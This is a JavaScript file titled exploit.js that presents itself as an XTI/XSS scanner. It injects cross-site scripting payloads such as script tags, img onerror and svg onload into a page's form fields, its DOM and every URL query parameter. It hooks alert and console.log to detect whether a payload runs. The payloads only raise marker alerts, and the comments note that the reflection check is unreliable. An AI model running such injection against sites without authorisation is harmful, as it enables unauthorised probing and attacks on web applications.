exploit.js
// █████ █████ ███████████ █████
// ░░███ ░░███ ░█░░░███░░░█░░███
// ░░███ ███ ░ ░███ ░ ░███
// ░░█████ ░███ ░███
// ███░███ ░███ ░███
// ███ ░░███ ░███ ░███
// █████ █████ █████ █████
// ░░░░░ ░░░░░ ░░░░░ ░░░░░
// === ADVANCED XTI / XSS SCANNER TOOL ===
// Step 0: Test payloads. Every entry begins with a closing </title> tag and
// carries the marker string 'XTI', which the detection hooks further down in
// this script search for.
const payloads = [
  "<script>alert('XTI')</script>",
  "<img src=x onerror=alert('XTI')>",
  "<svg onload=alert('XTI')>",
  "<script>console.log('XTI')</script>",
].map((tail) => `</title>${tail}`);

// Flipped to true by the hooks once the marker is observed.
let xssTriggered = false;
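// Step 1: Replace alert() and wrap console.log() so that a call carrying the
// 'XTI' marker is recorded in xssTriggered.
// Limits of this detection:
//  - The hooks only see calls made after this script has run; anything a page
//    script did before that is not observed.
//  - The native alert() is not kept, so no dialog is shown while the hook is
//    installed and the cleanup step cannot put alert() back.
//  - The console.log wrapper matches any string argument containing the
//    marker, including messages this script logs itself.
window.alert = function (msg) {
  // alert() accepts any value (alert(1), alert()); coerce before searching so
  // a non-string argument cannot throw inside the hook.
  const text = String(msg);
  if (text.includes('XTI')) {
    xssTriggered = true;
    console.warn('🚨 alert() triggered:', msg);
  }
};

// Kept so the wrapper can forward to it and so cleanup can restore it.
const originalConsoleLog = console.log;
console.log = function (...args) {
  for (const arg of args) {
    if (typeof arg === 'string' && arg.includes('XTI')) {
      xssTriggered = true;
      console.warn('🚨 console.log() triggered by payload:', arg);
    }
  }
  // Always forward, so normal logging keeps working while the hook is active.
  originalConsoleLog.apply(console, args);
};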
// Step 2: Watch <body> and its descendants for newly added nodes whose
// serialized markup contains the 'XTI' marker.
// A match shows only that the marker reached the DOM, not that any script
// ran, and it also fires for nodes this script adds itself.
const observer = new MutationObserver((records) => {
  for (const record of records) {
    for (const added of record.addedNodes) {
      // Nodes without outerHTML (text, comments) are skipped.
      if (!added.outerHTML || !added.outerHTML.includes('XTI')) {
        continue;
      }
      console.warn('🚨 DOM Mutation Detected:', added.outerHTML);
      xssTriggered = true;
    }
  }
});
observer.observe(document.body, { childList: true, subtree: true });
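// Step 3: Write the first payload into every form control on the page.
// Only the controls' current values change; nothing is submitted here.
const inputs = document.querySelectorAll('input, textarea, select');
{
  let filled = 0;
  for (const input of inputs) {
    try {
      // Assigning a non-empty value to <input type="file"> throws
      // InvalidStateError; without the guard that one field would abort the
      // rest of the script.
      input.value = payloads[0];
      filled += 1;
    } catch (err) {
      console.warn('Skipped a form field that rejected the value:', err);
    }
  }
  // Report the fields actually written, not the number matched.
  console.log(`✅ Injected payload into ${filled} form field(s)`);
}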
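// Step 4: Optional - add the first payload to the page inside an invisible div.
// insertAdjacentHTML appends without re-parsing the existing body content.
// `innerHTML +=` rebuilds every node in <body>, which drops event listeners
// and resets the form values written in Step 3.
document.body.insertAdjacentHTML(
  'beforeend',
  `<div style="opacity:0">${payloads[0]}</div>`
);
// The div just added contains the 'XTI' marker, so the Step 2 observer would
// count the script's own insertion as a finding. Discard the records this
// insertion queued before the observer callback runs.
observer.takeRecords();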
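// Step 5: Walk through the payloads one page load at a time by rewriting
// every query parameter of the current URL. sessionStorage carries the
// position in the payload list across page loads.
// If the URL has no query parameters, nothing below runs, including the
// cleanup: the observer and the console.log hook stay installed.
const currentUrl = new URL(window.location.href);
const paramKeys = Array.from(currentUrl.searchParams.keys());
// "xti_phase" is only read and removed in this script, never written, so this
// always falls back to "payload".
const phase = sessionStorage.getItem("xti_phase") || "payload";
// Stored values come back as strings; a missing or unparsable index restarts
// the run at the first payload.
const payloadIndex = (() => {
  const stored = Number.parseInt(
    sessionStorage.getItem("xti_payload_index") || "0",
    10
  );
  return Number.isInteger(stored) && stored >= 0 ? stored : 0;
})();

// PHASE 1: Inject payloads into URL parameters
if (phase === "payload" && paramKeys.length > 0) {
  if (payloadIndex < payloads.length) {
    // Bounds are checked before the lookup, so the parameters are never set
    // to the string "undefined" once the list is exhausted.
    const currentPayload = payloads[payloadIndex];
    paramKeys.forEach((key) => currentUrl.searchParams.set(key, currentPayload));
    sessionStorage.setItem("xti_payload_index", String(payloadIndex + 1));
    // Log through the unhooked function: the payload text contains the 'XTI'
    // marker and would otherwise set xssTriggered via the console.log hook.
    originalConsoleLog.call(
      console,
      `🚀 Injecting payload #${payloadIndex + 1}:`,
      currentPayload
    );
    window.location.href = currentUrl.toString();
  } else {
    // Step 6: Final Eval + Cleanup
    setTimeout(() => {
      const source = document.documentElement.outerHTML;
      // NOTE(review): '</title>' appears in the markup of any document that
      // has a <title> element, so this branch does not by itself show that a
      // payload was reflected.
      if (source.includes('</title>')) {
        console.log("✅ Reflection detected.");
      } else {
        console.log("❌ No reflection of payload.");
      }
      // xssTriggered covers only what the hooks saw on this page load, after
      // they were installed.
      if (!xssTriggered) {
        console.log("❌ Payloads did not execute.");
      }
      sessionStorage.removeItem("xti_phase");
      sessionStorage.removeItem("xti_payload_index");
      sessionStorage.removeItem("xti_template_injected");
      observer.disconnect();
      // Only console.log is restored; window.alert stays replaced because the
      // native function was never saved.
      console.log = originalConsoleLog;
    }, 1500);
  }
}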